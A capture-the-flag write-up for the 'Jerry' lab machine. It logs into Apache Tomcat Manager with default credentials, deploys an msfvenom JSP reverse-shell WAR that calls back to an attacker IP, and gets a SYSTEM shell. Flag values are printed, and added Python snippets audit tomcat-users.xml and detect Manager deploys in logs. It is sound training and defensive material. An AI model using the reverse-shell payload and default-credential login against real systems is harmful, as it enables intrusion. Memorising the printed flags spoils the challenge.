HTB: Jerry [Easy]
This is an easy Windows machine with Apache Tomcat running on port 8080. Default and weak credentials allow access to the Tomcat Manager. By uploading a simple WAR reverse shell, we get a system-level shell and read both flags quickly, with no privilege escalation needed.
Tools
- nmap
- msfvenom
- penelope
Initial Discovery
Nmap scan result:
┌──(kali㉿kali)-[~/Desktop/HTB/Jerry]
└─$ nmap -sCV -p- -T4 -vvv jerry.htb
Starting Nmap 7.95 ( https://nmap.org ) at 2025-12-22 11:25 +08
NSE: Loaded 157 scripts for scanning.
NSE: Script Pre-scanning.
NSE: Starting runlevel 1 (of 3) scan.
Initiating NSE at 11:25
Completed NSE at 11:25, 0.00s elapsed
NSE: Starting runlevel 2 (of 3) scan.
Initiating NSE at 11:25
Completed NSE at 11:25, 0.00s elapsed
NSE: Starting runlevel 3 (of 3) scan.
Initiating NSE at 11:25
Completed NSE at 11:25, 0.00s elapsed
Initiating Ping Scan at 11:25
Scanning jerry.htb (10.10.10.95) [4 ports]
Completed Ping Scan at 11:25, 0.04s elapsed (1 total hosts)
Initiating SYN Stealth Scan at 11:25
Scanning jerry.htb (10.10.10.95) [65535 ports]
Discovered open port 8080/tcp on 10.10.10.95
SYN Stealth Scan Timing: About 19.01% done; ETC: 11:28 (0:02:12 remaining)
SYN Stealth Scan Timing: About 48.05% done; ETC: 11:27 (0:01:06 remaining)
SYN Stealth Scan Timing: About 69.46% done; ETC: 11:28 (0:00:40 remaining)
Completed SYN Stealth Scan at 11:27, 123.69s elapsed (65535 total ports)
Initiating Service scan at 11:27
Scanning 1 service on jerry.htb (10.10.10.95)
Completed Service scan at 11:27, 6.05s elapsed (1 service on 1 host)
NSE: Script scanning 10.10.10.95.
NSE: Starting runlevel 1 (of 3) scan.
Initiating NSE at 11:27
Completed NSE at 11:28, 5.06s elapsed
NSE: Starting runlevel 2 (of 3) scan.
Initiating NSE at 11:28
Completed NSE at 11:28, 0.19s elapsed
NSE: Starting runlevel 3 (of 3) scan.
Initiating NSE at 11:28
Completed NSE at 11:28, 0.00s elapsed
Nmap scan report for jerry.htb (10.10.10.95)
Host is up, received echo-reply ttl 127 (0.018s latency).
Scanned at 2025-12-22 11:25:49 +08 for 136s
Not shown: 65534 filtered tcp ports (no-response)
PORT STATE SERVICE REASON VERSION
8080/tcp open http syn-ack ttl 127 Apache Tomcat/Coyote JSP engine 1.1
|_http-title: Apache Tomcat/7.0.88
| http-methods:
|_ Supported Methods: GET HEAD POST OPTIONS
|_http-server-header: Apache-Coyote/1.1
|_http-favicon: Apache Tomcat
NSE: Script Post-scanning.
NSE: Starting runlevel 1 (of 3) scan.
Initiating NSE at 11:28
Completed NSE at 11:28, 0.00s elapsed
NSE: Starting runlevel 2 (of 3) scan.
Initiating NSE at 11:28
Completed NSE at 11:28, 0.00s elapsed
NSE: Starting runlevel 3 (of 3) scan.
Initiating NSE at 11:28
Completed NSE at 11:28, 0.00s elapsed
Read data files from: /usr/share/nmap
Service detection performed. Please report any incorrect results at https://nmap.org/submit/ .
Nmap done: 1 IP address (1 host up) scanned in 135.50 seconds
Raw packets sent: 131167 (5.771MB) | Rcvd: 181 (21.468KB)
From the scan result, we identify an Apache Tomcat/Coyote JSP service running on port 8080. Then I would add the hostname jerry.htb to the local DNS entries, which are located at /etc/hosts.
Navigating to http[:]//jerry[.]htb[:]8080 shows that it is running Apache Tomcat/7.0.88.
After a little bit of information gathering, I found that visiting Server Status requires a username and password. I tried admin:admin and we were authorized.
However, when we tried to access List Application, I wasn’t able to gain access and it brought us to a 401 Access Denied page instead.
The Tomcat Manager interface was misconfigured and left using default/example credentials. Authenticating as tomcat:s3cret, which has the manager-gui role, grants access to the Manager GUI and the list of deployed applications.
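The misconfiguration described above can be checked for on your own Tomcat hosts by auditing tomcat-users.xml. The following is an added example, not part of the original write-up: the function name and the sample file are constructed for illustration, and the credential list contains only the two pairs this page mentions.

```python
import xml.etree.ElementTree as ET

# Credential pairs this write-up reports as accepted by the target.
KNOWN_DEFAULTS = {("admin", "admin"), ("tomcat", "s3cret")}
# Manager roles that allow WAR deployment (HTML GUI and text interface).
DEPLOY_ROLES = {"manager-gui", "manager-script"}
MANAGER_ROLES = DEPLOY_ROLES | {"manager-jmx", "manager-status"}

# Constructed sample, not the target's actual configuration file.
SAMPLE = """<?xml version="1.0" encoding="UTF-8"?>
<tomcat-users xmlns="http://tomcat.apache.org/xml">
  <role rolename="manager-gui"/>
  <user username="admin" password="admin" roles="manager-status"/>
  <user username="tomcat" password="s3cret" roles="manager-gui"/>
  <user username="deployer" password="Xq7#constructed-long-value" roles="manager-script"/>
  <user username="monitor" password="monitor" roles="manager-status"/>
</tomcat-users>"""

def audit_tomcat_users(xml_text):
    """Return (username, severity, reason) for Manager accounts with weak credentials."""
    findings = []
    for el in ET.fromstring(xml_text).iter():
        if el.tag.rsplit("}", 1)[-1] != "user":  # ignore the XML namespace, if any
            continue
        user = el.get("username", "")
        pw = el.get("password", "")
        roles = {r.strip() for r in el.get("roles", "").split(",") if r.strip()}
        mgr = roles & MANAGER_ROLES
        if not mgr:
            continue  # account cannot reach the Manager application
        if (user, pw) in KNOWN_DEFAULTS:
            reason = "credential pair from this write-up"
        elif pw.lower() == user.lower():
            reason = "password equals username"
        else:
            continue
        # Deploy-capable roles mean code execution as the Tomcat service account.
        severity = "critical" if roles & DEPLOY_ROLES else "high"
        findings.append((user, severity, f"{reason}; roles={sorted(mgr)}"))
    return findings

if __name__ == "__main__":
    for finding in audit_tomcat_users(SAMPLE):
        print(*finding, sep=" | ")
```

Any "critical" finding means the account can deploy applications, which on this machine ran as nt authority\system.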
Exploitation
Verify that the user tomcat is a valid user and that we are authorized. We can then upload our own reverse shell payload through the deploy .war file upload.
First, generate our payload using msfvenom.
┌──(kali㉿kali)-[~/Desktop/HTB/Jerry]
└─$ msfvenom -p java/jsp_shell_reverse_tcp LHOST=10.10.16.2 LPORT=4444 -f war -o payload.war
Payload size: 1104 bytes
Final size of war file: 1104 bytes
Saved as: payload.war
Set up a listener on the same port as our payload. We will be using penelope for that:
┌──(kali㉿kali)-[~/Desktop/HTB/Jerry]
└─$ penelope
[+] Listening for reverse shells on 0.0.0.0:4444 → 127.0.0.1 • 192.168.134.128 • 172.18.0.1 • 172.17.0.1 • 10.10.16.2
➤ 🏠 Main Menu (m) 💀 Payloads (p) 🔄 Clear (Ctrl-L) 🚫 Quit (q/Ctrl-C)
Upload our payload through the deploy form and simply interact with it from the application list.
We get a shell through penelope as nt authority\system:
┌──(kali㉿kali)-[~/Desktop/HTB/Jerry]
└─$ penelope
[+] Listening for reverse shells on 0.0.0.0:4444 → 127.0.0.1 • 192.168.134.128 • 172.18.0.1 • 172.17.0.1 • 10.10.16.2
➤ 🏠 Main Menu (m) 💀 Payloads (p) 🔄 Clear (Ctrl-L) 🚫 Quit (q/Ctrl-C)
[+] Got reverse shell from JERRY~10.10.10.95-Microsoft_Windows_Server_2012_R2_Standard-x64-based_PC 😍 Assigned SessionID <1>
[+] Added readline support...
[+] Interacting with session [1], Shell Type: Readline, Menu key: Ctrl-D
[+] Logging to /home/kali/.penelope/sessions/JERRY~10.10.10.95-Microsoft_Windows_Server_2012_R2_Standard-x64-based_PC/2025_12_22-11_54_22-292.log 📜
──────────────────────────────────────────────────────────────────────────────────────────────
whoami
whoami
nt authority\system
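The Manager logins and WAR upload described above leave a recognizable trail in Tomcat's access log. The following detection sketch is an added example, not part of the original write-up: it assumes the AccessLogValve "common" pattern, and the log lines are constructed to mirror the sequence on this page.

```python
import re
from collections import Counter, defaultdict

# Tomcat AccessLogValve "common" pattern: %h %l %u %t "%r" %s %b
LINE = re.compile(r'^(\S+) \S+ (\S+) \[([^\]]+)\] "(\S+) (\S+) [^"]*" (\d{3}) \S+$')
# Manager endpoints that deploy a WAR: the HTML upload form and the text interface.
DEPLOY = re.compile(r"^/manager/(html/upload|text/deploy)(\?|$)")

# Constructed log lines modelled on the sequence in this write-up (not real logs).
SAMPLE = [
    '10.10.16.2 - - [22/Dec/2025:11:40:01 +0800] "GET /manager/status HTTP/1.1" 401 2473',
    '10.10.16.2 - admin [22/Dec/2025:11:40:09 +0800] "GET /manager/status HTTP/1.1" 200 9120',
    '10.10.16.2 - tomcat [22/Dec/2025:11:45:12 +0800] "GET /manager/html HTTP/1.1" 200 17432',
    '10.10.16.2 - tomcat [22/Dec/2025:11:53:40 +0800] "POST /manager/html/upload?org.apache.catalina.filters.CSRF_NONCE=CONSTRUCTED HTTP/1.1" 200 18950',
    '10.10.16.2 - - [22/Dec/2025:11:54:20 +0800] "GET /payload/ HTTP/1.1" 200 -',
    '192.0.2.7 - - [22/Dec/2025:11:55:00 +0800] "GET /docs/ HTTP/1.1" 200 19367',
]

def analyze(lines):
    """Summarise Manager activity: deploys, per-IP accounts, 401 counts, follow-up contexts."""
    deploys, users, denied, followups = [], defaultdict(set), Counter(), []
    for line in lines:
        m = LINE.match(line)
        if not m:
            continue  # line does not follow the assumed log pattern
        ip, user, ts, method, path, status = m.groups()
        if path.startswith("/manager/"):
            if user != "-":
                users[ip].add(user)  # authenticated Manager account seen from this IP
            if status == "401":
                denied[ip] += 1
            if status.startswith("2") and DEPLOY.match(path):
                deploys.append((ip, user, ts, method))
        elif any(ip == d[0] for d in deploys):
            # First path segment = context the deploying client touched afterwards.
            ctx = "/" + path.lstrip("/").split("/", 1)[0]
            if ctx not in followups:
                followups.append(ctx)
    multi = {ip: sorted(u) for ip, u in users.items() if len(u) > 1}
    return {"deploys": deploys, "multi_account_ips": multi,
            "denied": dict(denied), "followup_contexts": followups}

if __name__ == "__main__":
    for key, value in analyze(SAMPLE).items():
        print(f"{key}: {value}")
```

A successful deploy from an address that is not a known build or admin host, followed by a request to a previously unseen context, is worth alerting on.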
We can find the flags located inside “C:\Users\Administrator\Desktop\flags”. Use type to read the content and we get both the user and root flags.
C:\Users\Administrator\Desktop>cd flags
cd flags
C:\Users\Administrator\Desktop\flags>dir
dir
Volume in drive C has no label.
Volume Serial Number is 0834-6C04
Directory of C:\Users\Administrator\Desktop\flags
06/19/2018 06:09 AM <DIR> .
06/19/2018 06:09 AM <DIR> ..
06/19/2018 06:11 AM 88 2 for the price of 1.txt
1 File(s) 88 bytes
2 Dir(s) 2,419,851,264 bytes free
C:\Users\Administrator\Desktop\flags>type "2 for the price of 1.txt"
type "2 for the price of 1.txt"
user.txt
7004dbcef0f854e0fb401875f26ebd00
root.txt
04a8b36e1545a455393d067e772fe90